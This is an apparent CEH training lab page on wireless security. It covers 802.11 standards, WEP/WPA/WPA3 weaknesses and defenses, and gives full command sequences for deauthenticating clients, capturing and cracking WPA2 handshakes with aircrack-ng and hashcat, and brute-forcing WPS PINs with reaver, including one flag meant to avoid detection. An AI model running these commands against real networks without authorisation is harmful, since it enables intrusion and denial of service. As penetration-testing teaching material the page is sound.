Wireless Attacks Lab
Wireless Attacks Lab
CEH v12 Chapter 16 - Comprehensive Reference Lab
Master the fundamentals of wireless security, from 802.11 standards to advanced attack techniques. This lab covers WiFi encryption protocols, authentication methods, and practical exploitation tools used in professional penetration testing.
ETHICAL USE ONLYLegal Notice: The techniques and tools described in this lab are for authorized penetration testing and educational purposes only. Unauthorized access to wireless networks is illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide.
You must have explicit written permission before testing any wireless network you do not own. Violation of these laws can result in severe criminal penalties including imprisonment and substantial fines.
Practice responsibly: Use isolated test environments, your own equipment, or authorized lab setups only.
WiFi Fundamentals| Standard | Year | Frequency | Max Speed | Range (Indoor) | Status |
|---|---|---|---|---|---|
| 802.11a | 1999 | 5 GHz | 54 Mbps | ~35 meters | Legacy |
| 802.11b | 1999 | 2.4 GHz | 11 Mbps | ~50 meters | Legacy |
| 802.11g | 2003 | 2.4 GHz | 54 Mbps | ~50 meters | Common |
| 802.11n (WiFi 4) | 2009 | 2.4/5 GHz | 600 Mbps | ~70 meters | Active |
| 802.11ac (WiFi 5) | 2014 | 5 GHz | 3.5 Gbps | ~50 meters | Active |
| 802.11ax (WiFi 6) | 2019 | 2.4/5 GHz | 9.6 Gbps | ~50 meters | Current |
2.4 GHz Band (2.400 - 2.4835 GHz):
5 GHz Band (5.150 - 5.825 GHz):
Authentication & Encryption Methods| Protocol | Encryption | Key Size | Authentication | Security Status | Crack Time |
|---|---|---|---|---|---|
| Open | None | N/A | None | VULNERABLE | Immediate |
| WEP | RC4 | 64/128-bit | Pre-shared key | BROKEN | < 1 minute |
| WPA (TKIP) | RC4 + TKIP | 128-bit | PSK or 802.1X | DEPRECATED | Hours to days |
| WPA2 (AES) | AES-CCMP | 128-bit | PSK or 802.1X | VULNERABLE* | Depends on password |
| WPA3 (SAE) | AES-GCMP | 128/192-bit | SAE (Dragonfly) | SECURE | Resistant to offline |
* WPA2 vulnerable to KRACK attack and weak passwords
No encryption or authentication required. Anyone can connect. All traffic visible in plaintext. Risk: Man-in-the-middle attacks, eavesdropping, data interception.
Wireless Attack Vectors
Rogue Access Point / Evil TwinAttacker creates fake AP with same or similar SSID to legitimate network. Users unknowingly connect, allowing traffic interception.
Tools: hostapd, airbase-ng, WiFi Pineapple
CRITICAL
Deauthentication AttackSend spoofed deauth frames to disconnect clients from AP. Forces reconnection to capture handshake or redirect to evil twin.
Tools: aireplay-ng, mdk4, scapy
HIGH
WPA Handshake CaptureCapture 4-way handshake during client authentication. Allows offline password cracking with dictionary or brute force.
Tools: airodump-ng, Wireshark, tcpdump
CRITICAL
Password CrackingOffline attack on captured handshake using wordlists or brute force. Success depends on password complexity.
Tools: aircrack-ng, hashcat, John the Ripper
CRITICAL
KRACK AttackKey Reinstallation Attack exploits WPA2 4-way handshake. Forces nonce reuse, allowing packet replay and decryption.
CVE: CVE-2017-13077 to CVE-2017-13088
CRITICAL Karma AttackResponds to client probe requests for previously connected networks. Device automatically connects to rogue AP.
Tools: MANA toolkit, WiFi Pineapple
HIGH
Packet SniffingMonitor mode capture of wireless traffic. On open networks or with key, all traffic visible including credentials and sensitive data.
Tools: Wireshark, tcpdump, Kismet
MEDIUM Channel Hopping / JammingDenial of service by flooding channels with noise or deauth frames. Disrupts wireless communications.
Tools: mdk4, aireplay-ng, RF jammers
HIGH WPS PIN AttackWiFi Protected Setup PIN is only 8 digits. Brute force attack can recover WPA/WPA2 password in hours.
Tools: Reaver, Bully, Pixie Dust attack
CRITICAL
WPA2 Handshake Capture Attack FlowPut wireless adapter into monitor mode to capture all wireless traffic
airmon-ng start wlan0
Scan for available wireless networks and identify target AP
airodump-ng wlan0mon
Lock onto target channel and BSSID, save capture to file
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon
Send deauth packets to force client reconnection and capture handshake
aireplay-ng -0 5 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon
Use dictionary attack or brute force on captured handshake
aircrack-ng -w rockyou.txt -b XX:XX:XX:XX:XX:XX capture-01.cap
Wireless Hacking Tool Reference# 1. Enable monitor mode
airmon-ng start wlan0
# 2. Check for interfering processes (optional)
airmon-ng check kill
# 3. Scan for networks
airodump-ng wlan0mon
# 4. Capture on specific channel and BSSID
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# 5. Deauthenticate client (in new terminal)
# -0 = deauth attack, 5 = number of deauth packets
# -a = AP BSSID, -c = client MAC
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# 6. Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# 7. Stop monitor mode when done
airmon-ng stop wlan0mon
# Automated WPA/WPA2 attack with dictionary
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
# Attack specific target
wifite --bssid AA:BB:CC:DD:EE:FF --wpa
# Attack WPS-enabled networks
wifite --wps
# Increase verbosity and skip already cracked
wifite -v --skip-crack
# Convert .cap to hashcat format (hc22000)
hcxpcapngtool -o capture.hc22000 capture-01.cap
# Crack WPA2 handshake with hashcat
# -m 22000 = WPA-PBKDF2-PMKID+EAPOL mode
hashcat -m 22000 -a 0 capture.hc22000 rockyou.txt
# Brute force attack (all combinations)
hashcat -m 22000 -a 3 capture.hc22000 ?d?d?d?d?d?d?d?d
# Show cracked passwords
hashcat -m 22000 capture.hc22000 --show
# Attack WPS PIN (8-digit brute force)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Use Pixie Dust attack (faster if vulnerable)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K -vv
# Add delay between attempts (avoid detection)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 5 -vv
# Start Kismet (opens web interface on localhost:2501)
kismet
# Run in background with specific interface
kismet -c wlan0
# Kismet can detect hidden SSIDs, clients, and WPS enabled APs
# Capture WiFi traffic
wireshark
# Filter for EAPOL handshake packets
eapol
# Filter for deauthentication frames
wlan.fc.type_subtype == 0x0c
# Filter for beacon frames
wlan.fc.type_subtype == 0x08
# Command line packet capture
tcpdump -i wlan0mon -w capture.pcap
Interactive Command Builder
Wireless Security DefensesWPA3 provides forward secrecy and protection against offline dictionary attacks. Mandatory management frame protection prevents deauth attacks.
If using WPA2-PSK, ensure password is resistant to dictionary attacks.
Deploy RADIUS-based authentication for centralized control and per-user encryption keys.
Deploy monitoring systems to detect rogue APs, evil twins, and attacks.
| Defense Measure | Effectiveness | Implementation Cost | Notes |
|---|---|---|---|
| MAC Address Filtering | LOW | Free | Easily bypassed by MAC spoofing. Security through obscurity. |
| Hidden SSID | LOW | Free | SSID revealed in probe requests. Provides no real security. |
| Strong WPA2 Password | MEDIUM-HIGH | Free | 20+ random characters resistant to cracking. Still vulnerable to KRACK. |
| WPA3 SAE | HIGH | Free (hardware support) | Best for home/SOHO. Requires WPA3-capable devices. |
| 802.1X Enterprise | VERY HIGH | Medium (RADIUS server) | Best for enterprise. Requires infrastructure and management. |
| Disable WPS | CRITICAL | Free | WPS PIN easily brute forced. Always disable in production. |
| Guest Network Isolation | HIGH | Free | Separate guest traffic from internal network. Reduces attack surface. |
| Wireless IDS/IPS | HIGH | High (enterprise) | Detects attacks in real-time. Automated response possible. |
Knowledge Assessment QuizTest your understanding of wireless security concepts. You need 8/10 to pass.